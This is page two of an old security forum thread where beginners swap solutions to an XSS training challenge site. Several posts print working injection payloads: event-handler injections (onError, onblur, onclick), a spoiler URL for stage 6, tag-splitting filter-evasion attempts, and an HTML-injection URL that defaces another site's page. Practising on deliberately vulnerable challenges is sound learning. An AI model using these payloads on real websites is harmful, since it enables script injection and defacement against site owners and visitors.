Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: Previous12
Current Page: 2 of 2
Re: XSS bootcamp
Posted by: hur
Date: February 05, 2008 01:04PM

hi, im new to xss. you gave the site, i tried but it didnt work or i may be i work it wrong. could you help me how to do this workshop. i just put the code in the textbox and then press the button but i didnt get any message.

Options: ReplyQuote
Re: XSS bootcamp
Posted by: DoctorDan
Date: February 05, 2008 03:27PM

@ hur
a place to start: http://www.w3schools.com/js/default.asp

Options: ReplyQuote
Re: XSS bootcamp
Posted by: fragge
Date: February 19, 2008 08:52PM

pretty sure I just copied the decryption js, made my own page with the hidden form stream data and updated the form data for each page, running the script on my own machine.. cheat = win

on a more serious note - what the hell is with stage 3.. i feel like a retard :| (edit: wtf, as if a url injection counts? what is this, baby school... :Z) and now 6 won't fuck off with the double quote at the end of my injection (ie: &lt;script>blahblah&lt;/script"> WHY WONT YOU LEAVE ME ALONE DOUBLE QUOTE I DON'T WANT TO USE ONBLUR. ><)

EDIT: Ok wtf? how does

">&lt;img src=. onError="javascript:decipher(document.forms.cipher); alert(document.forms.cipher.stream.value); document.forms.cipher.stream.value = document.forms.cipher.stream_copy.value;

not return my error.. the injection is coming up as

<img src=. onError="javascript:decipher(document.forms.cipher); alert(document.forms.cipher.stream.value); document.forms.cipher.stream.value = document.forms.cipher.stream_copy.value;">

on the page. Looks completely 100% fine to me.. it's just not executing my script. I've done this 1000 ways, none of them execute, they just LOOK correct. zz

edit (last): finally got the bitch.. was no different to my first attempts, it just started working. z z z z z



Edited 7 time(s). Last edit at 02/21/2008 09:47PM by fragge.

Options: ReplyQuote
Re: Reiners
Posted by: Allen
Date: March 03, 2008 07:12PM

Many thanks here!
I've passed all the stages,and obtained a lot!
I'm an XSS novice.
I think it is a very good Exchange platform here.

Options: ReplyQuote
Re: XSS bootcamp
Posted by: hax0r
Date: May 30, 2008 03:58AM

SPOILER!!!
Stage 6










http://blogged-on.de/xss/6.maxsize.php?input=%22%20onblur=%22javascript:decipher(document.forms.cipher);%20alert(document.forms.cipher.stream.value);%20document.forms.cipher.stream.value%20=%20document.forms.cipher.stream_copy.value

Options: ReplyQuote
Re: XSS bootcamp
Posted by: asilvermtzion
Date: June 27, 2008 11:20AM

any bright ideas on how to get past a regex filter on ":" (colon)? this makes any javascript:xxxx impossible.

Options: ReplyQuote
Re: XSS bootcamp
Posted by: thrill
Date: June 27, 2008 11:29AM

Quote

any bright ideas on how to get past a regex filter on ":" (colon)? this makes any javascript:xxxx impossible.

Thank you for reviving this old topic, but please stick to your original thread and try bumping that up to see if you get other responses.

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Options: ReplyQuote
Re: XSS workshop for beginners
Posted by: hydra
Date: October 17, 2008 02:46PM

Hi w0ts0n

I am new in XSS thing and stuck into stage 3, help me please :).

Options: ReplyQuote
Re: XSS bootcamp
Posted by: awk
Date: November 24, 2008 08:51PM

Hello,
I am newbie with XSS and have reached level 6, but cannot get beyond it.

From the description it seems that the script tags will be parsed out, and it is visible in the text reflected back on the screen. I have tried to use handlers like

http://blogged-on.de/xss/6.maxsize.php?input="onload="decipher(document.forms...."

which does not seem to work. Can someone please provide me with some idea as to how to get past this. I have also tried <scri"pt>,<scr<script>ipt> and some other variations but have not been successful.

There is a solution posted in this thread but that does not work either. Should I think about obfuscating the tags?

Thanks,
-A

Great Success!!

Options: ReplyQuote
Re: XSS bootcamp
Posted by: thornmaker
Date: November 24, 2008 09:07PM

There might be an easier way to pass stage 6, but read about how .mario xssed this registration page for one such method

Options: ReplyQuote
Re: XSS bootcamp
Posted by: awk
Date: November 24, 2008 09:29PM

thornmaker Wrote:
-------------------------------------------------------
> There might be an easier way to pass stage 6, but
> read about how .mario xssed this registration page
> for one such method


Thanks thornmaker, I tried out input=" onload=alert(1) a=" but got nowhere. I also tried out the name.xss link described in the post, and ended up at the "bad boy" page :-D .

I also went thru http://sla.ckers.org/forum/read.php?2,20942 , but still am a bit confused about how to get past this.

Thanks anyways,
-A

Options: ReplyQuote
Re: XSS bootcamp
Posted by: thornmaker
Date: November 24, 2008 10:11PM

check out this list of html tags to see what events go with each html tag. Note that onload does not work in an input tag (for IE, FF, and Safari at least)

Options: ReplyQuote
Re: XSS bootcamp
Posted by: awk
Date: November 25, 2008 02:02AM

wow! thanks.. its a useful list :-)

However, I used the input= thingy because in the source html I can see the value passed to the backend has the name input. Its a param, and does not seem to correlate with a html tag.

Do correct me if I am mistaken.

I did try onmousemove etc.. but it makes no difference :-(

Thanks,
-A

Great Success!!

Options: ReplyQuote
Re: XSS bootcamp
Posted by: Anonymous User
Date: November 25, 2008 07:12AM

Just replace onload in your example by onclick and click on the bloody input element ;)

Options: ReplyQuote
Re: XSS bootcamp
Posted by: awk
Date: November 25, 2008 02:03PM

Thanks mario .. the solution was so in-the-face.. ughhh!

-A

Options: ReplyQuote
Re: XSS bootcamp
Posted by: abo-ebrahem
Date: April 11, 2009 02:12PM

leavel 1
http://h4k.in/xssinexcess?title=%3C/title%3E%3Ccenter%3E%3Cb%3EHelo%20Admin%20Tried%20to%20increase%20the%20security%20of%20your%3Cbr%3EMessage%20by%20Abo-Ebrahem%3Cbr%3Ewww.7rs.org%3Cbr%3E



Edited 1 time(s). Last edit at 04/11/2009 03:56PM by abo-ebrahem.

Options: ReplyQuote
Re: XSS bootcamp
Posted by: LoKuM
Date: October 22, 2009 02:45PM

Hi,

I'm completly new to XSS, but I want to learn everything about it.

All the workshop sites in this thread are down.

Anyone can tell me where I can find a good tutorial or ebook for a XSS beginner?

Options: ReplyQuote
Pages: Previous12
Current Page: 2 of 2


Sorry, only registered users may post in this forum.